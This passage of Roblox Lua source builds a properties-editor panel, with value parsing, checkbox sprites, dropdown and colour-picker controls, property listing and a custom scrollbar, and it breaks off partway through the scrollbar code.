%d", r*255,g*255,b*255) elseif type == "UDim2" then local xScale = value.X.Scale local xOffset = value.X.Offset local yScale = value.Y.Scale local yOffset = value.Y.Offset return string.format("{%d, %d}, {%d, %d}", xScale, xOffset, yScale, yOffset) else return tostring(value) end end local function ToValue(value,type) if type == "Vector2" then local list = Split(value,",") if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return Vector2.new(x,y) elseif type == "Vector3" then local list = Split(value,",") if #list < 3 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 local z = tonumber(list[3]) or 0 return Vector3.new(x,y,z) elseif type == "Color3" then local list = Split(value,",") if #list < 3 then return nil end local r = tonumber(list[1]) or 0 local g = tonumber(list[2]) or 0 local b = tonumber(list[3]) or 0 return Color3.new(r/255,g/255, b/255) elseif type == "UDim2" then local list = Split(string.gsub(string.gsub(value, "{", ""),"}",""),",") if #list < 4 then return nil end local xScale = tonumber(list[1]) or 0 local xOffset = tonumber(list[2]) or 0 local yScale = tonumber(list[3]) or 0 local yOffset = tonumber(list[4]) or 0 return UDim2.new(xScale, xOffset, yScale, yOffset) elseif type == "Content" then if tonumber(value) ~= nil then value = ContentUrl .. value end return value elseif type == "float" or type == "int" or type == "double" then return tonumber(value) elseif type == "string" then return value elseif type == "NumberRange" then local list = Split(value,",") if #list == 1 then if tonumber(list[1]) == nil then return nil end local newVal = tonumber(list[1]) or 0 return NumberRange.new(newVal) end if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return NumberRange.new(x,y) else return nil end end -- Tables local function CopyTable(T) local t2 = {} for k,v in pairs(T) do t2[k] = v end return t2 end local function SortTable(T) table.sort(T, function(x,y) return x.Name < y.Name end) end -- Spritesheet local Sprite = { Width = 13; Height = 13; } local Spritesheet = { Image = "http://www.roblox.com/asset/?id=128896947"; Height = 256; Width = 256; } local Images = { "unchecked", "checked", "unchecked_over", "checked_over", "unchecked_disabled", "checked_disabled" } local function SpritePosition(spriteName) local x = 0 local y = 0 for i,v in pairs(Images) do if (v == spriteName) then return {x, y} end x = x + Sprite.Height if (x + Sprite.Width) > Spritesheet.Width then x = 0 y = y + Sprite.Height end end end local function GetCheckboxImageName(checked, readOnly, mouseover) if checked then if readOnly then return "checked_disabled" elseif mouseover then return "checked_over" else return "checked" end else if readOnly then return "unchecked_disabled" elseif mouseover then return "unchecked_over" else return "unchecked" end end end local MAP_ID = 418720155 -- Gui Controls -- ---- IconMap ---- -- Image size: 256px x 256px -- Icon size: 16px x 16px -- Padding between each icon: 2px -- Padding around image edge: 1px -- Total icons: 14 x 14 (196) local Icon do local iconMap = 'http://www.roblox.com/asset/?id=' .. MAP_ID game:GetService('ContentProvider'):Preload(iconMap) local iconDehash do -- 14 x 14, 0-based input, 0-based output local f=math.floor function iconDehash(h) return f(h/14%14),f(h%14) end end function Icon(IconFrame,index) local row,col = iconDehash(index) local mapSize = Vector2.new(256,256) local pad,border = 2,1 local iconSize = 16 local class = 'Frame' if type(IconFrame) == 'string' then class = IconFrame IconFrame = nil end if not IconFrame then IconFrame = Create(class,{ Name = "Icon"; BackgroundTransparency = 1; ClipsDescendants = true; Create('ImageLabel',{ Name = "IconMap"; Active = false; BackgroundTransparency = 1; Image = iconMap; Size = UDim2.new(mapSize.x/iconSize,0,mapSize.y/iconSize,0); }); }) end IconFrame.IconMap.Position = UDim2.new(-col - (pad*(col+1) + border)/iconSize,0,-row - (pad*(row+1) + border)/iconSize,0) return IconFrame end end local function CreateCell() local tableCell = Instance.new("Frame") tableCell.Size = UDim2.new(0.5, -1, 1, 0) tableCell.BackgroundColor3 = Row.BackgroundColor tableCell.BorderColor3 = Row.BorderColor return tableCell end local function CreateLabel(readOnly) local label = Instance.new("TextLabel") label.Font = Row.Font label.FontSize = Row.FontSize label.TextXAlignment = Row.TextXAlignment label.BackgroundTransparency = 1 if readOnly then label.TextColor3 = Row.TextLockedColor else label.TextColor3 = Row.TextColor end return label end local function CreateTextButton(readOnly, onClick) local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 if readOnly then button.TextColor3 = Row.TextLockedColor else button.TextColor3 = Row.TextColor button.MouseButton1Click:connect(function() onClick() end) end return button end local function CreateObject(readOnly) local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 if readOnly then button.TextColor3 = Row.TextLockedColor else button.TextColor3 = Row.TextColor end local cancel = Create(Icon('ImageButton',177),{ Name = "Cancel"; Visible = false; Position = UDim2.new(1,-20,0,0); Size = UDim2.new(0,20,0,20); Parent = button; }) return button end local function CreateTextBox(readOnly) if readOnly then local box = CreateLabel(readOnly) return box else local box = Instance.new("TextBox") if not SettingsRemote:Invoke("ClearProps") then box.ClearTextOnFocus = false end box.Font = Row.Font box.FontSize = Row.FontSize box.TextXAlignment = Row.TextXAlignment box.BackgroundTransparency = 1 box.TextColor3 = Row.TextColor return box end end local function CreateDropDownItem(text, onClick) local button = Instance.new("TextButton") button.Font = DropDown.Font button.FontSize = DropDown.FontSize button.TextColor3 = DropDown.TextColor button.TextXAlignment = DropDown.TextXAlignment button.BackgroundColor3 = DropDown.BackColor button.AutoButtonColor = false button.BorderSizePixel = 0 button.Active = true button.Text = text button.MouseEnter:connect(function() button.TextColor3 = DropDown.TextColorOver button.BackgroundColor3 = DropDown.BackColorOver end) button.MouseLeave:connect(function() button.TextColor3 = DropDown.TextColor button.BackgroundColor3 = DropDown.BackColor end) button.MouseButton1Click:connect(function() onClick(text) end) return button end local function CreateDropDown(choices, currentChoice, readOnly, onClick) local frame = Instance.new("Frame") frame.Name = "DropDown" frame.Size = UDim2.new(1, 0, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 button.TextColor3 = Row.TextColor if readOnly then button.TextColor3 = Row.TextLockedColor end button.Text = currentChoice button.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) button.Position = UDim2.new(0, Styles.Margin, 0, 0) button.Parent = frame local function showArrow(color) if arrow then arrow:Destroy() end local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = color; }) local graphicSize = 16/2 arrow = ArrowGraphic(graphicSize,'Down',true,graphicTemplate) arrow.Position = UDim2.new(1,-graphicSize * 2,0.5,-graphicSize/2) arrow.Parent = frame end local function hideMenu() expanded = false showArrow(DropDown.ArrowColor) if menu then menu:Destroy() end end local function showMenu() expanded = true menu = Instance.new("Frame") menu.Size = UDim2.new(1, -2 * margin, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, Row.Height + margin) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.Active = true menu.ZIndex = 5 menu.Parent = frame local parentFrameHeight = menu.Parent.Parent.Parent.Parent.Size.Y.Offset local rowHeight = menu.Parent.Parent.Parent.Position.Y.Offset if (rowHeight + menu.Size.Y.Offset) > math.max(parentFrameHeight,PropertiesFrame.AbsoluteSize.y) then menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateDropDownItem(name, function() choice(name) end) option.Size = UDim2.new(1, 0, 0, 16) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showArrow(DropDown.ArrowColor) if not readOnly then button.MouseEnter:connect(function() button.TextColor3 = Row.TextColor showArrow(DropDown.ArrowColorOver) end) button.MouseLeave:connect(function() button.TextColor3 = Row.TextColor if not expanded then showArrow(DropDown.ArrowColor) end end) button.MouseButton1Click:connect(function() if expanded then hideMenu() else showMenu() end end) end return frame,button end local function CreateBrickColor(readOnly, onClick) local frame = Instance.new("Frame") frame.Size = UDim2.new(1,0,1,0) frame.BackgroundTransparency = 1 local colorPalette = Instance.new("Frame") colorPalette.BackgroundTransparency = 0 colorPalette.SizeConstraint = Enum.SizeConstraint.RelativeXX colorPalette.Size = UDim2.new(1, -2 * BrickColors.OuterBorder, 1, -2 * BrickColors.OuterBorder) colorPalette.BorderSizePixel = BrickColors.BorderSizePixel colorPalette.BorderColor3 = BrickColors.BorderColor colorPalette.Position = UDim2.new(0, BrickColors.OuterBorder, 0, BrickColors.OuterBorder + Row.Height) colorPalette.ZIndex = 5 colorPalette.Visible = false colorPalette.BorderSizePixel = BrickColors.OuterBorder colorPalette.BorderColor3 = BrickColors.OuterBorderColor colorPalette.Parent = frame local function show() colorPalette.Visible = true end local function hide() colorPalette.Visible = false end local function toggle() colorPalette.Visible = not colorPalette.Visible end local colorBox = Instance.new("TextButton", frame) colorBox.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) colorBox.Size = UDim2.new(0, BrickColors.BoxSize, 0, BrickColors.BoxSize) colorBox.Text = "" colorBox.MouseButton1Click:connect(function() if not readOnly then toggle() end end) if readOnly then colorBox.AutoButtonColor = false end local spacingBefore = (Styles.Margin * 2) + BrickColors.BoxSize local propertyLabel = CreateTextButton(readOnly, function() if not readOnly then toggle() end end) propertyLabel.Size = UDim2.new(1, (-1 * spacingBefore) - Styles.Margin, 1, 0) propertyLabel.Position = UDim2.new(0, spacingBefore, 0, 0) propertyLabel.Parent = frame local size = (1 / BrickColors.ColorsPerRow) for index = 0, 127 do local brickColor = BrickColor.palette(index) local color3 = brickColor.Color local x = size * (index % BrickColors.ColorsPerRow) local y = size * math.floor(index / BrickColors.ColorsPerRow) local brickColorBox = Instance.new("TextButton") brickColorBox.Text = "" brickColorBox.Size = UDim2.new(size,0,size,0) brickColorBox.BackgroundColor3 = color3 brickColorBox.Position = UDim2.new(x, 0, y, 0) brickColorBox.ZIndex = colorPalette.ZIndex brickColorBox.Parent = colorPalette brickColorBox.MouseButton1Click:connect(function() hide() onClick(brickColor) end) end return frame,propertyLabel,colorBox end local function CreateColor3Control(readOnly, onClick) local frame = Instance.new("Frame") frame.Size = UDim2.new(1,0,1,0) frame.BackgroundTransparency = 1 local colorBox = Instance.new("TextButton", frame) colorBox.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) colorBox.Size = UDim2.new(0, BrickColors.BoxSize, 0, BrickColors.BoxSize) colorBox.Text = "" colorBox.AutoButtonColor = false local spacingBefore = (Styles.Margin * 2) + BrickColors.BoxSize local box = CreateTextBox(readOnly) box.Size = UDim2.new(1, (-1 * spacingBefore) - Styles.Margin, 1, 0) box.Position = UDim2.new(0, spacingBefore, 0, 0) box.Parent = frame return frame,box,colorBox end function CreateCheckbox(value, readOnly, onClick) local checked = value local mouseover = false local checkboxFrame = Instance.new("ImageButton") checkboxFrame.Size = UDim2.new(0, Sprite.Width, 0, Sprite.Height) checkboxFrame.BackgroundTransparency = 1 checkboxFrame.ClipsDescendants = true --checkboxFrame.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) local spritesheetImage = Instance.new("ImageLabel", checkboxFrame) spritesheetImage.Name = "SpritesheetImageLabel" spritesheetImage.Size = UDim2.new(0, Spritesheet.Width, 0, Spritesheet.Height) spritesheetImage.Image = Spritesheet.Image spritesheetImage.BackgroundTransparency = 1 local function updateSprite() local spriteName = GetCheckboxImageName(checked, readOnly, mouseover) local spritePosition = SpritePosition(spriteName) spritesheetImage.Position = UDim2.new(0, -1 * spritePosition[1], 0, -1 * spritePosition[2]) end local function setValue(val) checked = val updateSprite() end if not readOnly then checkboxFrame.MouseEnter:connect(function() mouseover = true updateSprite() end) checkboxFrame.MouseLeave:connect(function() mouseover = false updateSprite() end) checkboxFrame.MouseButton1Click:connect(function() onClick(checked) end) end updateSprite() return checkboxFrame, setValue end -- Code for handling controls of various data types -- local Controls = {} Controls["default"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local box = CreateTextBox(readOnly) box.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) box.Position = UDim2.new(0, Styles.Margin, 0, 0) local function update() local value = object[propertyName] box.Text = ToString(value, propertyType) end if not readOnly then box.FocusLost:connect(function(enterPressed) Set(object, propertyData, ToValue(box.Text,propertyType)) update() end) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return box end Controls["bool"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local checked = object[propertyName] local checkbox, setValue = CreateCheckbox(checked, readOnly, function(value) Set(object, propertyData, not checked) end) checkbox.Position = UDim2.new(0, Styles.Margin, 0, Styles.Margin) setValue(checked) local function update() checked = object[propertyName] setValue(checked) end object.Changed:connect(function(property) if (property == propertyName) then update() end end) if object:IsA("BoolValue") then object.Changed:connect(function(val) update() end) end update() return checkbox end Controls["BrickColor"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local frame,label,brickColorBox = CreateBrickColor(readOnly, function(brickColor) Set(object, propertyData, brickColor) end) local function update() local value = object[propertyName] brickColorBox.BackgroundColor3 = value.Color label.Text = tostring(value) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return frame end Controls["Color3"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local frame,textBox,colorBox = CreateColor3Control(readOnly) textBox.FocusLost:connect(function(enterPressed) Set(object, propertyData, ToValue(textBox.Text,"Color3")) local value = object[propertyName] colorBox.BackgroundColor3 = value textBox.Text = ToString(value, "Color3") end) local function update() local value = object[propertyName] colorBox.BackgroundColor3 = value textBox.Text = ToString(value, "Color3") end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return frame end Controls["Enum"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local enumName = object[propertyName].Name local enumNames = {} for _,enum in pairs(Enum[tostring(propertyType)]:GetEnumItems()) do table.insert(enumNames, enum.Name) end local dropdown, propertyLabel = CreateDropDown(enumNames, enumName, readOnly, function(value) Set(object, propertyData, value) end) --dropdown.Parent = frame local function update() local value = object[propertyName].Name propertyLabel.Text = tostring(value) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) return dropdown end Controls["Object"] = function(object, propertyData, readOnly) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local box = CreateObject(readOnly,function()end) box.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) box.Position = UDim2.new(0, Styles.Margin, 0, 0) local function update() if AwaitingObjectObj == object then if AwaitingObjectValue == true then box.Text = "Select an Object" return end end local value = object[propertyName] box.Text = ToString(value, propertyType) end if not readOnly then box.MouseButton1Click:connect(function() if AwaitingObjectValue then AwaitingObjectValue = false update() return end AwaitingObjectValue = true AwaitingObjectObj = object AwaitingObjectProp = propertyData box.Text = "Select an Object" end) box.Cancel.Visible = true box.Cancel.MouseButton1Click:connect(function() object[propertyName] = nil end) end update() object.Changed:connect(function(property) if (property == propertyName) then update() end end) if object:IsA("ObjectValue") then object.Changed:connect(function(val) update() end) end return box end function GetControl(object, propertyData, readOnly) local propertyType = propertyData["ValueType"] local control = nil if Controls[propertyType] then control = Controls[propertyType](object, propertyData, readOnly) elseif RbxApi.IsEnum(propertyType) then control = Controls["Enum"](object, propertyData, readOnly) else control = Controls["default"](object, propertyData, readOnly) end return control end -- Permissions function CanEditObject(object) local player = Players.LocalPlayer local character = player.Character return Permissions.CanEdit end function CanEditProperty(object,propertyData) local tags = propertyData["tags"] for _,name in pairs(tags) do if name == "readonly" then return false end end return CanEditObject(object) end --RbxApi local function PropertyIsHidden(propertyData) local tags = propertyData["tags"] for _,name in pairs(tags) do if name == "deprecated" or name == "hidden" or name == "writeonly" then return true end end return false end function Set(object, propertyData, value) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] if value == nil then return end for i,v in pairs(GetSelection()) do if CanEditProperty(v,propertyData) then pcall(function() --print("Setting " .. propertyName .. " to " .. tostring(value)) v[propertyName] = value end) end end end function CreateRow(object, propertyData, isAlternateRow) local propertyName = propertyData["Name"] local propertyType = propertyData["ValueType"] local propertyValue = object[propertyName] --rowValue, rowValueType, isAlternate local backColor = Row.BackgroundColor; if (isAlternateRow) then backColor = Row.BackgroundColorAlternate end local readOnly = not CanEditProperty(object, propertyData) if propertyType == "Instance" or propertyName == "Parent" then readOnly = true end local rowFrame = Instance.new("Frame") rowFrame.Size = UDim2.new(1,0,0,Row.Height) rowFrame.BackgroundTransparency = 1 rowFrame.Name = 'Row' local propertyLabelFrame = CreateCell() propertyLabelFrame.Parent = rowFrame propertyLabelFrame.ClipsDescendants = true local propertyLabel = CreateLabel(readOnly) propertyLabel.Text = propertyName propertyLabel.Size = UDim2.new(1, -1 * Row.TitleMarginLeft, 1, 0) propertyLabel.Position = UDim2.new(0, Row.TitleMarginLeft, 0, 0) propertyLabel.Parent = propertyLabelFrame local propertyValueFrame = CreateCell() propertyValueFrame.Size = UDim2.new(0.5, -1, 1, 0) propertyValueFrame.Position = UDim2.new(0.5, 0, 0, 0) propertyValueFrame.Parent = rowFrame local control = GetControl(object, propertyData, readOnly) control.Parent = propertyValueFrame rowFrame.MouseEnter:connect(function() propertyLabelFrame.BackgroundColor3 = Row.BackgroundColorMouseover propertyValueFrame.BackgroundColor3 = Row.BackgroundColorMouseover end) rowFrame.MouseLeave:connect(function() propertyLabelFrame.BackgroundColor3 = backColor propertyValueFrame.BackgroundColor3 = backColor end) propertyLabelFrame.BackgroundColor3 = backColor propertyValueFrame.BackgroundColor3 = backColor return rowFrame end function ClearPropertiesList() for _,instance in pairs(ContentFrame:GetChildren()) do instance:Destroy() end end local selection = Gui:FindFirstChild("Selection", 1) print(selection) function displayProperties(props) for i,v in pairs(props) do pcall(function() local a = CreateRow(v.object, v.propertyData, ((numRows % 2) == 0)) a.Position = UDim2.new(0,0,0,numRows*Row.Height) a.Parent = ContentFrame numRows = numRows + 1 end) end end function checkForDupe(prop,props) for i,v in pairs(props) do if v.propertyData.Name == prop.Name and v.propertyData.ValueType == prop.ValueType then return true end end return false end function sortProps(t) table.sort(t, function(x,y) return x.propertyData.Name < y.propertyData.Name end) end function showProperties(obj) ClearPropertiesList() if obj == nil then return end local propHolder = {} local foundProps = {} numRows = 0 for _,nextObj in pairs(obj) do if not foundProps[nextObj.className] then foundProps[nextObj.className] = true for i,v in pairs(RbxApi.GetProperties(nextObj.className)) do local suc, err = pcall(function() if not (PropertyIsHidden(v)) and not checkForDupe(v,propHolder) then if string.find(string.lower(v.Name),string.lower(propertiesSearch.Text)) or not searchingProperties() then table.insert(propHolder,{propertyData = v, object = nextObj}) end end end) --[[if not suc then warn("Problem getting the value of property " .. v.Name .. " | " .. err) end --]] end end end sortProps(propHolder) displayProperties(propHolder) ContentFrame.Size = UDim2.new(1, 0, 0, numRows * Row.Height) scrollBar.ScrollIndex = 0 scrollBar.TotalSpace = numRows * Row.Height scrollBar.Update() end ---------------------------------------------------------------- -----------------------SCROLLBAR STUFF-------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- local ScrollBarWidth = 16 local ScrollStyles = { Background = Color3.new(233/255, 233/255, 233/255); Border = Color3.new(149/255, 149/255, 149/255); Selected = Color3.new( 63/255, 119/255, 189/255); BorderSelected = Color3.new( 55/255, 106/255, 167/255); Text = Color3.new( 0/255, 0/255, 0/255); TextDisabled = Color3.new(128/255, 128/255, 128/255); TextSelected = Color3.new(255/255, 255/255, 255/255); Button = Color3.new(221/255, 221/255, 221/255); ButtonBorder = Color3.new(149/255, 149/255, 149/255); ButtonSelected = Color3.new(255/255, 0/255, 0/255); Field = Color3.new(255/255, 255/255, 255/255); FieldBorder = Color3.new(191/255, 191/255, 191/255); TitleBackground = Color3.new(178/255, 178/255, 178/255); } do local ZIndexLock = {} function SetZIndex(object,z) if not ZIndexLock[object] then ZIndexLock[object] = true if object:IsA'GuiObject' then object.ZIndex = z end local children = object:GetChildren() for i = 1,#children do SetZIndex(children[i],z) end ZIndexLock[object] = nil end end end function SetZIndexOnChanged(object) return object.Changed:connect(function(p) if p == "ZIndex" then SetZIndex(object,object.ZIndex) end end) end function Create(ty,data) local obj if type(ty) == 'string' then obj = Instance.new(ty) else obj = ty end for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end -- returns the ascendant ScreenGui of an object function GetScreen(screen) if screen == nil then return nil end while not screen:IsA("ScreenGui") do screen = screen.Parent if screen == nil then return nil end end return screen end -- AutoButtonColor doesn't always reset properly function ResetButtonColor(button) local active = button.Active button.Active = not active button.Active = active end function ArrowGraphic(size,dir,scaled,template) local Frame = Create('Frame',{ Name = "Arrow Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size,0,size); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end local transform if dir == nil or dir == 'Up' then function transform(p,s) return p,s end elseif dir == 'Down' then function transform(p,s) return UDim2.new(0,p.X.Offset,0,size-p.Y.Offset-1),s end elseif dir == 'Left' then function transform(p,s) return UDim2.new(0,p.Y.Offset,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end elseif dir == 'Right' then function transform(p,s) return UDim2.new(0,size-p.Y.Offset-1,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end end local scale if scaled then function scale(p,s) return UDim2.new(p.X.Offset/size,0,p.Y.Offset/size,0),UDim2.new(s.X.Offset/size,0,s.Y.Offset/size,0) end else function scale(p,s) return p,s end end local o = math.floor(size/4) if size%2 == 0 then local n = size/2-1 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,(i+1)*2,0,1) )) t.Position = p t.Size = s t.Parent = Frame end else local n = (size-1)/2 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,i*2+1,0,1) )) t.Position = p t.Size = s t.Parent = Frame end end if size%4 > 1 then local t = template:Clone() local p,s = scale(transform( UDim2.new(0,0,0,size-o-1), UDim2.new(0,size,0,1) )) t.Position = p t.Size = s t.Parent = Frame end return Frame end function GripGraphic(size,dir,spacing,scaled,template) local Frame = Create('Frame',{ Name = "Grip Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size.x,0,size.y); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end spacing = spacing or 2 local scale if scaled then function scale(p) return UDim2.new(p.X.Offset/size.x,0,p.Y.Offset/size.y,0) end else function scale(p) return p end end if dir == 'Vertical' then for i=0,size.x-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,1,0,size.y)) t.Position = scale(UDim2.new(0,i,0,0)) t.Parent = Frame end elseif dir == nil or dir == 'Horizontal' then for i=0,size.y-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,size.x,0,1)) t.Position = scale(UDim2.new(0,0,0,i)) t.Parent = Frame end end return Frame end do local mt = { __index = { GetScrollPercent = function(self) return self.ScrollIndex/(self.TotalSpace-self.VisibleSpace) end; CanScrollDown = function(self) return self.ScrollIndex + self.VisibleSpace < self.TotalSpace end; CanScrollUp = function(self) return self.ScrollIndex > 0 end; ScrollDown = function(self) self.ScrollIndex = self.ScrollIndex + self.PageIncrement self:Update() end; ScrollUp = function(self) self.ScrollIndex = self.ScrollIndex - self.PageIncrement self:Update() end; ScrollTo = function(self,index) self.ScrollIndex = index self:Update() end; SetScrollPercent = function(self,percent) self.ScrollIndex = math.floor((self.TotalSpace - self.VisibleSpace)*percent + 0.5) self:Update() end; }; } mt.__index.CanScrollRight = mt.__index.CanScrollDown mt.__index.CanScrollLeft = mt.__index.CanScrollUp mt.__index.ScrollLeft = mt.__index.ScrollUp mt.__index.ScrollRight = mt.__index.ScrollDown function ScrollBar(horizontal) -- create row scroll bar local ScrollFrame = Create('Frame',{ Name = "ScrollFrame"; Position = horizontal and UDim2.new(0,0,1,-ScrollBarWidth) or UDim2.new(1,-ScrollBarWidth,0,0); Size = horizontal and UDim2.new(1,0,0,ScrollBarWidth) or UDim2.new(0,ScrollBarWidth,1,0); BackgroundTransparency = 1; Create('ImageButton',{ Name = "ScrollDown"; Position = horizontal and UDim2.new(1,-ScrollBarWidth,0,0) or UDim2.new(0,0,1,-ScrollBarWidth); Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollUp"; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollBar"; Size = horizontal and UDim2.new(1,-ScrollBarWidth*2,1,0) or UDim2.new(1,0,1,-ScrollBarWidth*2); Position = horizontal and UDim2.new(0,ScrollBarWidth,0,0) or UDim2.new(0,0,0,ScrollBarWidth); AutoButtonColor = false; BackgroundColor3 = Color3.new(0.94902, 0.94902, 0.94902); BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; Create('ImageButton',{ Name = "ScrollThumb"; AutoButtonColor = false; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); }); }) local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = ScrollStyles.Border; }) local graphicSize = ScrollBarWidth/2 local ScrollDownFrame = ScrollFrame.ScrollDown local ScrollDownGraphic = ArrowGraphic(graphicSize,horizontal and 'Right' or 'Down',true,graphicTemplate) ScrollDownGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollDownGraphic.Parent = ScrollDownFrame local ScrollUpFrame = ScrollFrame.ScrollUp local ScrollUpGraphic = ArrowGraphic(graphicSize,horizontal and 'Left' or 'Up',true,graphicTemplate) ScrollUpGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollUpGraphic.Parent = ScrollUpFrame local ScrollBarFrame = ScrollFrame.ScrollBar local ScrollThumbFrame = ScrollBarFrame.ScrollThumb do local size = ScrollBarWidth*3/8 local Decal = GripGraphic(Vector2.new(size,size),horizontal and 'Vertical' or 'Horizontal',2,graphicTemplate) Decal.Position = UDim2.new(0.5,-size/2,0.5,-size/2) Decal.Parent = ScrollThumbFrame end local MouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local Class = setmetatable({ GUI = ScrollFrame; ScrollIndex = 0; VisibleSpace = 0; TotalSpace = 0; PageIncrement = 1; },mt) local UpdateScrollThumb if horizontal then function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(Class.VisibleSpace/Class.TotalSpace,0,0,ScrollBarWidth) if ScrollThumbFrame.AbsoluteSize.x < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.x ScrollThumbFrame.Position = UDim2.new(Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.x)/barSize,0,0,0) end else function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,Class.VisibleSpace/Class.TotalSpace,0) if ScrollThumbFrame.AbsoluteSize.y < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.y ScrollThumbFrame.Position = UDim2.new(0,0,Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.y)/barSize,0) end end local lastDown local lastUp local scrollStyle = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0} local scrollStyle_ds = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0.7} local function Update() local t = Class.TotalSpace local v = Class.VisibleSpace local s = Class.ScrollIndex if v <= t then if s > 0 then if s + v > t then Class.ScrollIndex = t - v end else Class.ScrollIndex = 0 end else Class.ScrollIndex = 0 end if Class.UpdateCallback then if Class.UpdateCallback(Class) == false then return end end local down = Class:CanScrollDown() local up = Class:CanScrollUp() if down ~= lastDown then lastDown = down ScrollDownFrame.Active = down ScrollDownFrame.AutoButtonColor = down local children = ScrollDownGraphic:GetChildren() local style = down and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end if up ~= lastUp then lastUp = up ScrollUpFrame.Active = up ScrollUpFrame.AutoButtonColor = up local children = ScrollUpGraphic:GetChildren() local style = up and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end ScrollThumbFrame.Visible = down or up UpdateScrollThumb() end Class.Update = Update SetZIndexOnChanged(ScrollFrame) local scrollEventID = 0 ScrollDownFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollDownFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollDown() wait(0.2) -- delay before auto scroll while scrollEventID == current do Class:ScrollDown() if not Class:CanScrollDown() then break end wait() end end) ScrollDownFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) ScrollUpFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = 